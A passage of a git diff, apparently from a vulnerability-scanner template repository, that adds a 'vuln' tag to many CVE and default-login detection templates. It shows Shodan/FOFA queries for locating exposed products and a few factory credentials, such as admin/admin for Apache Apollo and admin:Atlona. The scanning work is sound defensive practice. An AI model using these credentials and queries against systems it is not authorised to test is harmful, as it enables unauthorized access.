cve,cve2025,wordpress,wpscan,wpbookit,intrusive,file-upload,wp + tags: cve,cve2025,wordpress,wpscan,wpbookit,intrusive,file-upload,wp,vuln variables: diff --git a/http/cves/2025/CVE-2025-61666.yaml b/http/cves/2025/CVE-2025-61666.yaml index 0edced0b021..a62bbc7bfc7 100644 --- a/http/cves/2025/CVE-2025-61666.yaml +++ b/http/cves/2025/CVE-2025-61666.yaml @@ -18,7 +18,7 @@ info: max-request: 1 shodan-query: html:"Traccar" fofa-query: app="Traccar" - tags: cve,cve2025,traccar,lfi + tags: cve,cve2025,traccar,lfi,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-61882.yaml b/http/cves/2025/CVE-2025-61882.yaml index 6d5b96b665c..ef9c88ed1fb 100644 --- a/http/cves/2025/CVE-2025-61882.yaml +++ b/http/cves/2025/CVE-2025-61882.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 1 fofa-query: title="E-Business Suite" - tags: cve,cve2025,oracle,ebusiness,lfi,rce,ssrf,kev,vkev + tags: cve,cve2025,oracle,ebusiness,lfi,rce,ssrf,kev,vkev,vuln flow: http(1) || http(2) diff --git a/http/cves/2025/CVE-2025-6197.yaml b/http/cves/2025/CVE-2025-6197.yaml index bb7dd4ebaa6..ad071d4c9f8 100644 --- a/http/cves/2025/CVE-2025-6197.yaml +++ b/http/cves/2025/CVE-2025-6197.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 shodan-query: html:"grafana" - tags: cve,cve2025,redirect,grafana,open-redirect + tags: cve,cve2025,redirect,grafana,open-redirect,vuln variables: username: "{{username}}" diff --git a/http/cves/2025/CVE-2025-6204.yaml b/http/cves/2025/CVE-2025-6204.yaml index 91f0c9ee54e..88472c6cbd9 100644 --- a/http/cves/2025/CVE-2025-6204.yaml +++ b/http/cves/2025/CVE-2025-6204.yaml @@ -21,7 +21,7 @@ info: cwe-id: CWE-94 cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" cvss-score: 9.0 - tags: cve,cve2025,delmia,apriso,rce,traversal,upload,intrusive + tags: cve,cve2025,delmia,apriso,rce,traversal,upload,intrusive,vuln flow: http(1) && http(2) && http(3) && http(4) && http(5) diff --git a/http/cves/2025/CVE-2025-6205.yaml b/http/cves/2025/CVE-2025-6205.yaml index a143f30c488..60a82c73191 100644 --- a/http/cves/2025/CVE-2025-6205.yaml +++ b/http/cves/2025/CVE-2025-6205.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: title:"DELMIA Apriso" - tags: cve,cve2025,delmia,apriso,unauth,intrusive + tags: cve,cve2025,delmia,apriso,unauth,intrusive,vuln variables: username: "LAST" diff --git a/http/cves/2025/CVE-2025-6851.yaml b/http/cves/2025/CVE-2025-6851.yaml index 37e813042f3..d305214ca1a 100644 --- a/http/cves/2025/CVE-2025-6851.yaml +++ b/http/cves/2025/CVE-2025-6851.yaml @@ -29,7 +29,7 @@ info: product: broken_link_notifier publicwww-query: "/wp-content/plugins/broken-link-notifier/" fofa-query: body="blnotifier_front_end" - tags: cve,cve2025,wp-plugin,wordpress,ssrf,oast,unauth,wpscan,broken-link-notifier,vkev + tags: cve,cve2025,wp-plugin,wordpress,ssrf,oast,unauth,wpscan,broken-link-notifier,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-6934.yaml b/http/cves/2025/CVE-2025-6934.yaml index aa4f28c5b92..15162583a70 100644 --- a/http/cves/2025/CVE-2025-6934.yaml +++ b/http/cves/2025/CVE-2025-6934.yaml @@ -26,7 +26,7 @@ info: vendor: themeforest product: opal-estate-pro publicwww-query: "/wp-content/plugins/opal-estate-pro/" - tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,opalestate + tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,opalestate,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-6970.yaml b/http/cves/2025/CVE-2025-6970.yaml index 9dea71b9310..11b1b8d06ca 100644 --- a/http/cves/2025/CVE-2025-6970.yaml +++ b/http/cves/2025/CVE-2025-6970.yaml @@ -29,7 +29,7 @@ info: vendor: wp-events-plugin product: events_manager publicwww-query: "/wp-content/plugins/events-manager/" - tags: cve,cve2025,events-manager,sqli,time-based,wordpress,wpscan,wp-plugin,wp + tags: cve,cve2025,events-manager,sqli,time-based,wordpress,wpscan,wp-plugin,wp,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-7160.yaml b/http/cves/2025/CVE-2025-7160.yaml index c2d3ca1e306..df01ff245c7 100644 --- a/http/cves/2025/CVE-2025-7160.yaml +++ b/http/cves/2025/CVE-2025-7160.yaml @@ -20,7 +20,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2025,edb,packetstorm,zms,sqli,auth-bypass,cms + tags: cve,cve2025,edb,packetstorm,zms,sqli,auth-bypass,cms,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-8085.yaml b/http/cves/2025/CVE-2025-8085.yaml index b57f7caf90d..04093f0a918 100644 --- a/http/cves/2025/CVE-2025-8085.yaml +++ b/http/cves/2025/CVE-2025-8085.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.html:"/wp-content/plugins/ditty-news-ticker/" fofa-query: body="/wp-content/plugins/ditty-news-ticker/" publicwww-query: "/wp-content/plugins/ditty-news-ticker/" - tags: cve,cve2025,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,metaphorcreations + tags: cve,cve2025,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,metaphorcreations,vuln variables: marker_string: "{{rand_text_alpha(5)}}" diff --git a/http/cves/2025/CVE-2025-8868.yaml b/http/cves/2025/CVE-2025-8868.yaml index 094ba95a276..3608edb5c93 100644 --- a/http/cves/2025/CVE-2025-8868.yaml +++ b/http/cves/2025/CVE-2025-8868.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 fofa-query: body="Chef Automate" - tags: cve,cve2025,chef,automate,sqli,vkev + tags: cve,cve2025,chef,automate,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-9196.yaml b/http/cves/2025/CVE-2025-9196.yaml index f762580f62e..21326c13dfa 100644 --- a/http/cves/2025/CVE-2025-9196.yaml +++ b/http/cves/2025/CVE-2025-9196.yaml @@ -27,7 +27,7 @@ info: product: trinity-audio framework: wordpress fofa-query: body="/wp-content/plugins/trinity-audio" - tags: cve,cve2025,wp-plugin,wordpress,trinity-audio,exposure + tags: cve,cve2025,wp-plugin,wordpress,trinity-audio,exposure,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-9744.yaml b/http/cves/2025/CVE-2025-9744.yaml index 8daaddee170..5a398180575 100644 --- a/http/cves/2025/CVE-2025-9744.yaml +++ b/http/cves/2025/CVE-2025-9744.yaml @@ -20,7 +20,7 @@ info: metadata: verified: true max-request: 2 - tags: cve,cve2025,auth-bypass,cms,packetstorm,edb,loancms,sqli + tags: cve,cve2025,auth-bypass,cms,packetstorm,edb,loancms,sqli,vuln http: - raw: diff --git a/http/default-logins/3com/3Com-wireless-default-login.yaml b/http/default-logins/3com/3Com-wireless-default-login.yaml index 5bf358b2ee6..734f60b5d88 100644 --- a/http/default-logins/3com/3Com-wireless-default-login.yaml +++ b/http/default-logins/3com/3Com-wireless-default-login.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 2 fofa-query: "title=\"3COM\"" - tags: default-login,3com + tags: default-login,3com,vuln http: - raw: diff --git a/http/default-logins/3com/3com-nj2000-default-login.yaml b/http/default-logins/3com/3com-nj2000-default-login.yaml index 6cfd4aea435..07daa8d341e 100644 --- a/http/default-logins/3com/3com-nj2000-default-login.yaml +++ b/http/default-logins/3com/3com-nj2000-default-login.yaml @@ -16,7 +16,7 @@ info: max-request: 1 shodan-query: http.title:"ManageEngine Password" fofa-query: body="NJ2000" - tags: default-login,3com,nj2000 + tags: default-login,3com,nj2000,vuln http: - raw: diff --git a/http/default-logins/3ware-default-login.yaml b/http/default-logins/3ware-default-login.yaml index 89d210e230e..9553b88a20d 100644 --- a/http/default-logins/3ware-default-login.yaml +++ b/http/default-logins/3ware-default-login.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: title:"3ware" - tags: default-login,3ware,3dm2 + tags: default-login,3ware,3dm2,vuln http: - raw: diff --git a/http/default-logins/UCMDB/ucmdb-default-login.yaml b/http/default-logins/UCMDB/ucmdb-default-login.yaml index fbdb8b62759..b2b87eac80b 100644 --- a/http/default-logins/UCMDB/ucmdb-default-login.yaml +++ b/http/default-logins/UCMDB/ucmdb-default-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-798 metadata: max-request: 1 - tags: ucmdb,default-login,packetstorm + tags: ucmdb,default-login,packetstorm,vuln http: - raw: diff --git a/http/default-logins/abb/cs141-default-login.yaml b/http/default-logins/abb/cs141-default-login.yaml index a3ae4e138f1..a90c674d145 100644 --- a/http/default-logins/abb/cs141-default-login.yaml +++ b/http/default-logins/abb/cs141-default-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.html:"CS141" product: cs141 vendor: generex - tags: hiawatha,iot,default-login + tags: hiawatha,iot,default-login,vuln http: - raw: diff --git a/http/default-logins/activemq/activemq-artemis-default-login.yaml b/http/default-logins/activemq/activemq-artemis-default-login.yaml index 239833cabf4..5d0ad046be8 100644 --- a/http/default-logins/activemq/activemq-artemis-default-login.yaml +++ b/http/default-logins/activemq/activemq-artemis-default-login.yaml @@ -12,7 +12,7 @@ info: vendor: apache product: activemq shodan-query: title:"ActiveMQ Artemis Console" - tags: apache,activemq,artemis,default-login + tags: apache,activemq,artemis,default-login,vuln http: - method: POST diff --git a/http/default-logins/activemq/activemq-default-login.yaml b/http/default-logins/activemq/activemq-default-login.yaml index 9b27e94a2fe..743eb9d5963 100644 --- a/http/default-logins/activemq/activemq-default-login.yaml +++ b/http/default-logins/activemq/activemq-default-login.yaml @@ -12,7 +12,7 @@ info: vendor: apache max-request: 2 shodan-query: title:"ActiveMQ Artemis Console" - tags: apache,activemq,default-login + tags: apache,activemq,default-login,vuln http: - raw: diff --git a/http/default-logins/adminer-default-login.yaml b/http/default-logins/adminer-default-login.yaml index 69ef5495732..a34ee5918e2 100644 --- a/http/default-logins/adminer-default-login.yaml +++ b/http/default-logins/adminer-default-login.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 5 shodan-query: http.title:adminer - tags: default-login,adminer + tags: default-login,adminer,vuln http: - raw: diff --git a/http/default-logins/aem/aem-default-login.yaml b/http/default-logins/aem/aem-default-login.yaml index 9a046f76b72..5754c5b4d69 100644 --- a/http/default-logins/aem/aem-default-login.yaml +++ b/http/default-logins/aem/aem-default-login.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.component:"Adobe Experience Manager" product: experience_manager vendor: adobe - tags: aem,default-login,adobe + tags: aem,default-login,adobe,vuln http: - raw: diff --git a/http/default-logins/aem/aem-felix-console.yaml b/http/default-logins/aem/aem-felix-console.yaml index a80f72799d2..e6403a833c5 100644 --- a/http/default-logins/aem/aem-felix-console.yaml +++ b/http/default-logins/aem/aem-felix-console.yaml @@ -20,7 +20,7 @@ info: - http.component:"Adobe Experience Manager" product: experience_manager_cloud_service vendor: adobe - tags: default-login,misconfig,aem,adobe + tags: default-login,misconfig,aem,adobe,vuln http: - method: GET diff --git a/http/default-logins/alibaba/canal-default-login.yaml b/http/default-logins/alibaba/canal-default-login.yaml index c7fe9b6284a..e2c11db0ea6 100644 --- a/http/default-logins/alibaba/canal-default-login.yaml +++ b/http/default-logins/alibaba/canal-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: canal,alibaba,default-login + tags: canal,alibaba,default-login,vuln http: - raw: diff --git a/http/default-logins/allnet/allnet-default-login.yaml b/http/default-logins/allnet/allnet-default-login.yaml index 108ac03c9fe..5c7b5d69018 100644 --- a/http/default-logins/allnet/allnet-default-login.yaml +++ b/http/default-logins/allnet/allnet-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:-121681558 - tags: default-login,allnet + tags: default-login,allnet,vuln http: - raw: diff --git a/http/default-logins/alphaweb/alphaweb-default-login.yaml b/http/default-logins/alphaweb/alphaweb-default-login.yaml index fd6e2445bd4..8dd32b67fec 100644 --- a/http/default-logins/alphaweb/alphaweb-default-login.yaml +++ b/http/default-logins/alphaweb/alphaweb-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: default-login,AlphaWeb + tags: default-login,AlphaWeb,vuln http: - raw: diff --git a/http/default-logins/ambari/ambari-default-login.yaml b/http/default-logins/ambari/ambari-default-login.yaml index d945cbd9025..f74e9b4c5b3 100644 --- a/http/default-logins/ambari/ambari-default-login.yaml +++ b/http/default-logins/ambari/ambari-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: ambari,default-login,apache + tags: ambari,default-login,apache,vuln http: - raw: diff --git a/http/default-logins/ampjuke-default-login.yaml b/http/default-logins/ampjuke-default-login.yaml index 114c48399a5..285b570a8ac 100644 --- a/http/default-logins/ampjuke-default-login.yaml +++ b/http/default-logins/ampjuke-default-login.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 3 shodan-query: "http.favicon.hash:-121681558" - tags: default-login,ampjuke + tags: default-login,ampjuke,vuln http: - raw: diff --git a/http/default-logins/apache/airflow-default-login.yaml b/http/default-logins/apache/airflow-default-login.yaml index f04de240e74..11606ab0cf5 100644 --- a/http/default-logins/apache/airflow-default-login.yaml +++ b/http/default-logins/apache/airflow-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: apache max-request: 2 shodan-query: title:"Sign In - Airflow" - tags: airflow,default-login,apache + tags: airflow,default-login,apache,vuln http: - raw: diff --git a/http/default-logins/apache/airflow-v3-default-login.yaml b/http/default-logins/apache/airflow-v3-default-login.yaml index 79d8d2b1e12..e274c973f3e 100644 --- a/http/default-logins/apache/airflow-v3-default-login.yaml +++ b/http/default-logins/apache/airflow-v3-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: apache max-request: 2 shodan-query: title:"Airflow" - tags: airflow,default-login,apache + tags: airflow,default-login,apache,vuln http: - raw: diff --git a/http/default-logins/apache/apache-apollo-default-login.yaml b/http/default-logins/apache/apache-apollo-default-login.yaml index 17831c1f43a..0cf34c112a3 100644 --- a/http/default-logins/apache/apache-apollo-default-login.yaml +++ b/http/default-logins/apache/apache-apollo-default-login.yaml @@ -12,7 +12,7 @@ info: vendor: apache product: activemq_apollo shodan-query: title:"Apache Apollo" - tags: apache,apollo,default-login,misconfig + tags: apache,apollo,default-login,misconfig,vuln variables: username: 'admin' password: 'admin' diff --git a/http/default-logins/apache/apache-hertzbeat-default-login.yaml b/http/default-logins/apache/apache-hertzbeat-default-login.yaml index a2dc7b5f600..08ed5391b3f 100644 --- a/http/default-logins/apache/apache-hertzbeat-default-login.yaml +++ b/http/default-logins/apache/apache-hertzbeat-default-login.yaml @@ -12,7 +12,7 @@ info: max-request: 4 verified: true shodan-query: title:"HertzBeat" - tags: apache,hertzbeat,default-login + tags: apache,hertzbeat,default-login,vuln variables: password: hertzbeat diff --git a/http/default-logins/apache/apache-inlong-default-login.yaml b/http/default-logins/apache/apache-inlong-default-login.yaml index 34ec07189ef..fd9f283a815 100644 --- a/http/default-logins/apache/apache-inlong-default-login.yaml +++ b/http/default-logins/apache/apache-inlong-default-login.yaml @@ -15,7 +15,7 @@ info: vendor: apache product: inlong fofa-query: icon_hash="1155196680" - tags: apache,inlong,default-login,misconfig + tags: apache,inlong,default-login,misconfig,vuln variables: username: admin diff --git a/http/default-logins/apache/apache-streampark-default-login.yaml b/http/default-logins/apache/apache-streampark-default-login.yaml index 00fe0a98760..832f105a2e5 100644 --- a/http/default-logins/apache/apache-streampark-default-login.yaml +++ b/http/default-logins/apache/apache-streampark-default-login.yaml @@ -15,7 +15,7 @@ info: vendor: apache product: streampark shodan-query: title:"Apache StreamPark" - tags: apache,streampark,default-login + tags: apache,streampark,default-login,vuln http: - raw: diff --git a/http/default-logins/apache/apisix-default-login.yaml b/http/default-logins/apache/apisix-default-login.yaml index 3a8ec10e4d6..1e9b4882af8 100644 --- a/http/default-logins/apache/apisix-default-login.yaml +++ b/http/default-logins/apache/apisix-default-login.yaml @@ -16,7 +16,7 @@ info: product: https://apisix.apache.org shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" - tags: apisix,apache,default-login + tags: apisix,apache,default-login,vuln http: - raw: diff --git a/http/default-logins/apache/cloudstack-default-login.yaml b/http/default-logins/apache/cloudstack-default-login.yaml index eb463534125..94963acdbca 100644 --- a/http/default-logins/apache/cloudstack-default-login.yaml +++ b/http/default-logins/apache/cloudstack-default-login.yaml @@ -14,7 +14,7 @@ info: vendor: apache product: cloudstack shodan-query: http.title:"Apache CloudStack" - tags: default-login,apache,cloudstack + tags: default-login,apache,cloudstack,vuln http: - raw: diff --git a/http/default-logins/apache/dolphinscheduler-default-login.yaml b/http/default-logins/apache/dolphinscheduler-default-login.yaml index b6be86274c3..4ddc1c65f90 100644 --- a/http/default-logins/apache/dolphinscheduler-default-login.yaml +++ b/http/default-logins/apache/dolphinscheduler-default-login.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"DolphinScheduler" product: dolphinscheduler vendor: apache - tags: apache,dolphinscheduler,default-login,oss + tags: apache,dolphinscheduler,default-login,oss,vuln http: - raw: diff --git a/http/default-logins/apache/doris-default-login.yaml b/http/default-logins/apache/doris-default-login.yaml index f8076790329..1b5f35c1911 100644 --- a/http/default-logins/apache/doris-default-login.yaml +++ b/http/default-logins/apache/doris-default-login.yaml @@ -13,7 +13,7 @@ info: product: doris shodan-query: http.favicon.hash:"24048806" fofa-query: icon_hash=24048806 - tags: apache,default-login,doris + tags: apache,default-login,doris,vuln http: - raw: diff --git a/http/default-logins/apache/dubbo-admin-default-login.yaml b/http/default-logins/apache/dubbo-admin-default-login.yaml index 2a315fbc8b2..6bca55cbe31 100644 --- a/http/default-logins/apache/dubbo-admin-default-login.yaml +++ b/http/default-logins/apache/dubbo-admin-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 2 - tags: dubbo,apache,default-login + tags: dubbo,apache,default-login,vuln http: - raw: diff --git a/http/default-logins/apache/kafka-center-default-login.yaml b/http/default-logins/apache/kafka-center-default-login.yaml index 9f4d2275e03..870b94a3e72 100644 --- a/http/default-logins/apache/kafka-center-default-login.yaml +++ b/http/default-logins/apache/kafka-center-default-login.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Kafka Center" - tags: kafka,default-login + tags: kafka,default-login,vuln http: - raw: diff --git a/http/default-logins/apache/karaf-default-login.yaml b/http/default-logins/apache/karaf-default-login.yaml index 9d61d0984d4..4eb8f9d1568 100644 --- a/http/default-logins/apache/karaf-default-login.yaml +++ b/http/default-logins/apache/karaf-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: realm="karaf" product: karaf vendor: apache - tags: default-login,apache,karaf + tags: default-login,apache,karaf,vuln http: - raw: diff --git a/http/default-logins/apache/kylin-default-login.yaml b/http/default-logins/apache/kylin-default-login.yaml index c304c9d5379..1d093a66e04 100644 --- a/http/default-logins/apache/kylin-default-login.yaml +++ b/http/default-logins/apache/kylin-default-login.yaml @@ -17,7 +17,7 @@ info: vendor: apache product: kylin fofa-query: app="APACHE-kylin" - tags: kylin,default-login,apache + tags: kylin,default-login,apache,vuln http: - raw: diff --git a/http/default-logins/apache/ranger-default-login.yaml b/http/default-logins/apache/ranger-default-login.yaml index 3efeae62264..6b4a328c3de 100644 --- a/http/default-logins/apache/ranger-default-login.yaml +++ b/http/default-logins/apache/ranger-default-login.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"Ranger - Sign In" product: ranger vendor: apache - tags: apache,ranger,default-login + tags: apache,ranger,default-login,vuln http: - raw: diff --git a/http/default-logins/apache/tomcat-default-login.yaml b/http/default-logins/apache/tomcat-default-login.yaml index 741cf08ee8d..207994f62b9 100644 --- a/http/default-logins/apache/tomcat-default-login.yaml +++ b/http/default-logins/apache/tomcat-default-login.yaml @@ -15,7 +15,7 @@ info: vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" - tags: tomcat,apache,default-login + tags: tomcat,apache,default-login,vuln http: - raw: diff --git a/http/default-logins/apache/tomcat-examples-login.yaml b/http/default-logins/apache/tomcat-examples-login.yaml index 2924a7d851f..0758348cbbf 100644 --- a/http/default-logins/apache/tomcat-examples-login.yaml +++ b/http/default-logins/apache/tomcat-examples-login.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true max-request: 2 - tags: default-login,tomcat + tags: default-login,tomcat,vuln http: - raw: diff --git a/http/default-logins/apc-nmc/apc-nmc-default-login.yaml b/http/default-logins/apc-nmc/apc-nmc-default-login.yaml index 39ec70cd364..c099ce8a4dd 100644 --- a/http/default-logins/apc-nmc/apc-nmc-default-login.yaml +++ b/http/default-logins/apc-nmc/apc-nmc-default-login.yaml @@ -20,7 +20,7 @@ info: fofa-query: title="APC | Log On" product: apc-network-management-card vendor: schneider-electric - tags: apc,default-login,iot,ups + tags: apc,default-login,iot,ups,vuln http: - raw: diff --git a/http/default-logins/apollo/apollo-default-login.yaml b/http/default-logins/apollo/apollo-default-login.yaml index 9035cd3281a..f2864a9cf7e 100644 --- a/http/default-logins/apollo/apollo-default-login.yaml +++ b/http/default-logins/apollo/apollo-default-login.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.favicon.hash:11794165 product: apollo vendor: ctrip - tags: apollo,default-login + tags: apollo,default-login,vuln http: - raw: diff --git a/http/default-logins/arl/arl-default-login.yaml b/http/default-logins/arl/arl-default-login.yaml index e9d0a6af683..b4159687b66 100644 --- a/http/default-logins/arl/arl-default-login.yaml +++ b/http/default-logins/arl/arl-default-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: arl,default-login + tags: arl,default-login,vuln http: - raw: diff --git a/http/default-logins/asus/asus-rtn16-default-login.yaml b/http/default-logins/asus/asus-rtn16-default-login.yaml index 1e304e74f1e..6b5fd2ae81e 100644 --- a/http/default-logins/asus/asus-rtn16-default-login.yaml +++ b/http/default-logins/asus/asus-rtn16-default-login.yaml @@ -14,7 +14,7 @@ info: vendor: asus product: rt-n16 shodan-query: "RT-N16" - tags: default-login,asus,rt-n16 + tags: default-login,asus,rt-n16,vuln http: - raw: diff --git a/http/default-logins/asus/asus-wl500g-default-login.yaml b/http/default-logins/asus/asus-wl500g-default-login.yaml index 7aa4d5a60e0..4aa031dd1b7 100644 --- a/http/default-logins/asus/asus-wl500g-default-login.yaml +++ b/http/default-logins/asus/asus-wl500g-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: "WL-500G" - tags: default-login,asus,wl-500 + tags: default-login,asus,wl-500,vuln http: - raw: diff --git a/http/default-logins/asus/asus-wl520GU-default-login.yaml b/http/default-logins/asus/asus-wl520GU-default-login.yaml index 70510fa06c7..1709d80ff61 100644 --- a/http/default-logins/asus/asus-wl520GU-default-login.yaml +++ b/http/default-logins/asus/asus-wl520GU-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: "WL-520GU" - tags: default-login,asus,wl-520gu + tags: default-login,asus,wl-520gu,vuln http: - raw: diff --git a/http/default-logins/atlona/atlona-default-login.yaml b/http/default-logins/atlona/atlona-default-login.yaml index 5057c9bc174..ada6ecc05e3 100644 --- a/http/default-logins/atlona/atlona-default-login.yaml +++ b/http/default-logins/atlona/atlona-default-login.yaml @@ -8,7 +8,7 @@ info: The Atlona AT-OME-MS42, a 4x2 matrix switcher supporting HDMI, USB-C, and DisplayPort inputs, is accessible via a built-in web management interface. By default, this interface uses the factory-set credentials admin:Atlona. If left unchanged, attackers could gain unauthorized administrative access to the device, potentially allowing them to alter configurations, disrupt AV switching, or pivot further into the network. reference: - https://atlona.com/pdf/manuals/AT-OME-MS42_G.pdf - tags: atlona,default-login + tags: atlona,default-login,vuln http: - raw: diff --git a/http/default-logins/audiocodes/audiocodes-default-login.yaml b/http/default-logins/audiocodes/audiocodes-default-login.yaml index b48a0763ac1..c361f9daa96 100644 --- a/http/default-logins/audiocodes/audiocodes-default-login.yaml +++ b/http/default-logins/audiocodes/audiocodes-default-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-798 metadata: max-request: 1 - tags: iot,audiocodes,default-login + tags: iot,audiocodes,default-login,vuln http: - raw: diff --git a/http/default-logins/azkaban/azkaban-default-login.yaml b/http/default-logins/azkaban/azkaban-default-login.yaml index 7e97dca0ae2..7ec0b975463 100644 --- a/http/default-logins/azkaban/azkaban-default-login.yaml +++ b/http/default-logins/azkaban/azkaban-default-login.yaml @@ -13,7 +13,7 @@ info: shodan-query: http.title:"Azkaban Web Client" product: azkaban vendor: azkaban_project - tags: default-login,azkaban + tags: default-login,azkaban,vuln http: - raw: diff --git a/http/default-logins/barco-clickshare-default-login.yaml b/http/default-logins/barco-clickshare-default-login.yaml index a9579ffd5ff..18d31d681d9 100644 --- a/http/default-logins/barco-clickshare-default-login.yaml +++ b/http/default-logins/barco-clickshare-default-login.yaml @@ -13,7 +13,7 @@ info: vendor: barco product: clickshare_cs-100_huddle_firmware shodan-query: "ClickShareSession" - tags: default-login,barco,clickshare + tags: default-login,barco,clickshare,vuln http: - raw: diff --git a/http/default-logins/batflat/batflat-default-login.yaml b/http/default-logins/batflat/batflat-default-login.yaml index bed5cf912a1..765612e5191 100644 --- a/http/default-logins/batflat/batflat-default-login.yaml +++ b/http/default-logins/batflat/batflat-default-login.yaml @@ -17,7 +17,7 @@ info: vendor: batflat product: batflat google-query: intext:"Powered by Batflat." - tags: default-login,batflat + tags: default-login,batflat,vuln http: - raw: diff --git a/http/default-logins/bigant/bigant-default-login.yaml b/http/default-logins/bigant/bigant-default-login.yaml index 2a51ff9451d..0fc5110b544 100644 --- a/http/default-logins/bigant/bigant-default-login.yaml +++ b/http/default-logins/bigant/bigant-default-login.yaml @@ -15,7 +15,7 @@ info: max-request: 2 shodan-query: title:"BigAnt" fofa-query: title="BigAnt" - tags: default-login,bigant + tags: default-login,bigant,vuln variables: username: "superadmin" diff --git a/http/default-logins/bloofoxcms-default-login.yaml b/http/default-logins/bloofoxcms-default-login.yaml index b2f462bc1aa..413ff687d8a 100644 --- a/http/default-logins/bloofoxcms-default-login.yaml +++ b/http/default-logins/bloofoxcms-default-login.yaml @@ -17,7 +17,7 @@ info: vendor: bloofox product: bloofoxcms fofa-query: "Powered by bloofoxCMS" - tags: bloofox,cms,default-login + tags: bloofox,cms,default-login,vuln http: - raw: diff --git a/http/default-logins/bonita/bonita-default-login.yaml b/http/default-logins/bonita/bonita-default-login.yaml index ad1a5392269..426d7791bfc 100644 --- a/http/default-logins/bonita/bonita-default-login.yaml +++ b/http/default-logins/bonita/bonita-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1197926023 - tags: bonita,default-login,misconfig + tags: bonita,default-login,misconfig,vuln variables: username: install diff --git a/http/default-logins/caimore/caimore-default-login.yaml b/http/default-logins/caimore/caimore-default-login.yaml index 743017869a8..27662674ae9 100644 --- a/http/default-logins/caimore/caimore-default-login.yaml +++ b/http/default-logins/caimore/caimore-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: app="CAIMORE-Gateway" - tags: ciamore-gateway,default-login + tags: ciamore-gateway,default-login,vuln http: - raw: diff --git a/http/default-logins/camaleon/camaleon-default-login.yaml b/http/default-logins/camaleon/camaleon-default-login.yaml index 10098bc2f0a..7696ef2e30d 100644 --- a/http/default-logins/camaleon/camaleon-default-login.yaml +++ b/http/default-logins/camaleon/camaleon-default-login.yaml @@ -10,7 +10,7 @@ info: vendor: tuzitio product: camaleon_cms shodan-query: html:"camaleon_cms" - tags: camaleon,default-login + tags: camaleon,default-login,vuln variables: username: "admin" diff --git a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml index dfa5be99fb9..70abea49001 100644 --- a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml +++ b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 fofa-query: "title=\"Welcome to Canopy\"" - tags: default-login,cambium,canopy + tags: default-login,cambium,canopy,vuln http: - raw: diff --git a/http/default-logins/camunda/camunda-default-login.yaml b/http/default-logins/camunda/camunda-default-login.yaml index 031636c5c06..20b948b8d97 100644 --- a/http/default-logins/camunda/camunda-default-login.yaml +++ b/http/default-logins/camunda/camunda-default-login.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 2 shodan-query: http.html:"Camunda Welcome" - tags: default-login,camunda + tags: default-login,camunda,vuln http: - raw: diff --git a/http/default-logins/canon/canon-c3325-default-login.yaml b/http/default-logins/canon/canon-c3325-default-login.yaml index fe7906c1c72..b02d59176e7 100644 --- a/http/default-logins/canon/canon-c3325-default-login.yaml +++ b/http/default-logins/canon/canon-c3325-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"c3325" - tags: canon,c3325,default-login,misconfig + tags: canon,c3325,default-login,misconfig,vuln variables: username: "Administrator" diff --git a/http/default-logins/caprover/caprover-default-login.yaml b/http/default-logins/caprover/caprover-default-login.yaml index 89ff27d0fe9..784767d0937 100644 --- a/http/default-logins/caprover/caprover-default-login.yaml +++ b/http/default-logins/caprover/caprover-default-login.yaml @@ -10,7 